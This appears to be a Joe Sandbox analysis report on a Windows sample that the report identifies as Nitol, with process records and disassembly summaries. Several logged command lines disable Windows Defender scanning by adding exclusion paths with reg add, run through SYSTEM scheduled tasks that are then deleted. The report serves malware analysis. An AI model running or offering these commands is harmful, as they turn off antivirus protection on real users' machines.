File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	02:31:10
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6a9cf0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	02:31:10
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	02:31:10
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	02:31:10
Start date:	01/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6ecb50000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	02:31:11
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6a9cf0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	02:31:11
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	02:31:11
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	02:31:11
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	02:31:11
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6a9cf0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	02:31:11
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	02:31:11
Start date:	01/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	02:31:11
Start date:	01/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6ecb50000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	02:31:41
Start date:	01/01/2025
Path:	C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe"
Imagebase:	0xbf0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	02:31:44
Start date:	01/01/2025
Path:	C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe"
Imagebase:	0xbf0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	02:31:44
Start date:	01/01/2025
Path:	C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe"
Imagebase:	0x940000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	02:31:45
Start date:	01/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c echo.>c:\xxxx.ini
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	02:31:45
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	02:32:01
Start date:	01/01/2025
Path:	C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe"
Imagebase:	0xbf0000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	02:32:01
Start date:	01/01/2025
Path:	C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe"
Imagebase:	0x940000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	31.8%
Total number of Nodes:	466
Total number of Limit Nodes:	7

Executed Functions

Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0000000140006FA2
@, xrefs: 0000000140006D6C

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00000001400073E2

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 0000000140005F30
malloc.MSVCRT ref: 0000000140005FD3
ReadFile.KERNELBASE ref: 0000000140006016

Strings

d, xrefs: 0000000140005EE1
s, xrefs: 0000000140005F5F
., xrefs: 0000000140005F78
s, xrefs: 0000000140005EA1
a, xrefs: 0000000140005F96
d, xrefs: 0000000140005F7D
M, xrefs: 0000000140005E99
t, xrefs: 0000000140005F73
l, xrefs: 0000000140005F82
., xrefs: 0000000140005ED9
a, xrefs: 0000000140005EE9
l, xrefs: 0000000140005F87
s, xrefs: 0000000140005EC9
i, xrefs: 0000000140005EC1
c, xrefs: 0000000140005F69
c, xrefs: 0000000140005FAA
M, xrefs: 0000000140005EA9
p, xrefs: 0000000140005EB1
m, xrefs: 0000000140005F5A
m, xrefs: 0000000140005F91
r, xrefs: 0000000140005F6E
t, xrefs: 0000000140005EF1
v, xrefs: 0000000140005F64
l, xrefs: 0000000140005F9B
L, xrefs: 0000000140005EB9
l, xrefs: 0000000140005FA0
o, xrefs: 0000000140005FA5
t, xrefs: 0000000140005ED1

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: File$CreateReadmalloc
String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
API String ID: 3950102678-3381721293
Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

Function 00007FFE13201C00 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFE13201C28
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFE13201C7A
_RTC_Initialize.LIBCMT ref: 00007FFE13201CA8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFE13201CCE
__scrt_release_startup_lock.LIBCMT ref: 00007FFE13201CF9

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction ID: 3695f5a7d9a82fdc37271ed5d0d79df2da65dbdb7a5364e60b30a44cec963eb2
Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction Fuzzy Hash: 7E819C24E08F434EFB54BB67954127D6290AFE67A0F2440B6EA0D677B2DE3CF949C600

Function 00007FFE13201720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNEL32 ref: 00007FFE13201753
FreeLibrary.KERNEL32 ref: 00007FFE13201981

Part of subcall function 00007FFE13201B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE13201BC0
Part of subcall function 00007FFE13201B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE13201BC6

Part of subcall function 00007FFE13201720: FindFirstFileA.KERNELBASE ref: 00007FFE13201536

Strings

WordpadFilter.db, xrefs: 00007FFE13201527

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
String ID: WordpadFilter.db
API String ID: 868324331-3647581008
Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction ID: 05494675f25e7497f6d9c28bb1fd0425354dc321d0caf4ab2700440da5a2e9bd
Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction Fuzzy Hash: E2319C32B15F418DE700EBA2D8402AD73A5EBA8798F148635EE8D23B59EF38D155C340

Function 00007FFE132011B0 Relevance: 3.2, APIs: 2, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFE132014EB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE132014F7

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction ID: 584a7b5222864ff76b7a15302aa4a08cf586172d8fb7dc69f903e924efa095c6
Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction Fuzzy Hash: A6814E26A19B924AE6119B36984017DA694FFA6BD4F248335EF59737A2DF3CF091C300

Non-executed Functions

Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
EnterCriticalSection.KERNEL32 ref: 0000000140001B48
LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
EnterCriticalSection.KERNEL32 ref: 0000000140001BE6
LeaveCriticalSection.KERNEL32 ref: 0000000140001C67
EnterCriticalSection.KERNEL32 ref: 0000000140001C84
LeaveCriticalSection.KERNEL32 ref: 0000000140001D0D
lstrlenW.KERNEL32 ref: 0000000140001D1F
GetProcessHeap.KERNEL32 ref: 0000000140001D2E
HeapAlloc.KERNEL32 ref: 0000000140001D3C
EnterCriticalSection.KERNEL32 ref: 0000000140001D6F
LeaveCriticalSection.KERNEL32 ref: 0000000140001DF0
lstrlenW.KERNEL32 ref: 0000000140001DFF
GetProcessHeap.KERNEL32 ref: 0000000140001E0E
HeapAlloc.KERNEL32 ref: 0000000140001E1C
EnterCriticalSection.KERNEL32 ref: 0000000140001E4F
LeaveCriticalSection.KERNEL32 ref: 0000000140001ED0
EnterCriticalSection.KERNEL32 ref: 0000000140001EED
LeaveCriticalSection.KERNEL32 ref: 0000000140001F6E
lstrlenW.KERNEL32 ref: 0000000140001F7D
GetProcessHeap.KERNEL32 ref: 0000000140001F8C
HeapAlloc.KERNEL32 ref: 0000000140001F9A
EnterCriticalSection.KERNEL32 ref: 0000000140001FCD
LeaveCriticalSection.KERNEL32 ref: 000000014000204E
lstrlenW.KERNEL32 ref: 000000014000205D
GetProcessHeap.KERNEL32 ref: 000000014000206C
HeapAlloc.KERNEL32 ref: 000000014000207A
EnterCriticalSection.KERNEL32 ref: 00000001400020B4
LeaveCriticalSection.KERNEL32 ref: 000000014000214E

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
String ID:
API String ID: 3526400053-0
Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740

Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
OpenProcessToken.ADVAPI32 ref: 0000000140004007
GetLastError.KERNEL32 ref: 0000000140004011
LookupPrivilegeValueW.ADVAPI32 ref: 000000014000403A
AdjustTokenPrivileges.ADVAPI32 ref: 0000000140004080
GetLastError.KERNEL32 ref: 000000014000408A
CloseHandle.KERNEL32 ref: 0000000140004095
EnterCriticalSection.KERNEL32 ref: 00000001400040B3
LeaveCriticalSection.KERNEL32 ref: 000000014000412B
GetVersionExW.KERNEL32 ref: 0000000140004155
RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
RpcServerListen.RPCRT4 ref: 00000001400041D3
CreateWaitableTimerW.KERNEL32 ref: 0000000140004205
CreateEventW.KERNEL32 ref: 000000014000421C
SetWaitableTimer.KERNEL32 ref: 0000000140004289

Strings

ampStartSingletone: logging started, settins=%s, xrefs: 0000000140003FD5
SeLoadDriverPrivilege, xrefs: 000000014000402A
null, xrefs: 0000000140003FCE

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
API String ID: 3408796845-4213300970
Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44

Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

Strings

ampStopSingletone: logging ended, xrefs: 00000001400043B2

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
String ID: ampStopSingletone: logging ended
API String ID: 2048888615-3533855269
Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744

Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
